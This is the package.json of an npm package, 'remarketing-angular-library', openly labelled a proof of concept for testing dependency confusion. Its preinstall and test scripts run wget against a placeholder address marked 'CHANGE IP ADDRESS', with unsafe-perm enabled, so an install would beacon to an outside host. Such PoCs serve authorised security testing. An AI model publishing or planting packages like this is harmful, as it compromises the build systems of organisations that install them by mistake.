remarketing-angular-library
Version:
Simple PoC package for testing for dependency confusion 1/21
20 lines (19 loc) • 442 B
JSON
{
"name": "remarketing-angular-library",
"version": "1.0.1",
"description": "Simple PoC package for testing for dependency confusion 1/21",
"main": "index.js",
"scripts": {
"test": "wget --quiet # CHANGE IP ADDRESS",
"preinstall": "wget --quiet \"\" # CHANGE IP ADDRESS"
},
"keywords": [
"test",
"PoC"
],
"config": {
"unsafe-perm": true
},
"author": "WayCup",
"license": "ISC"
}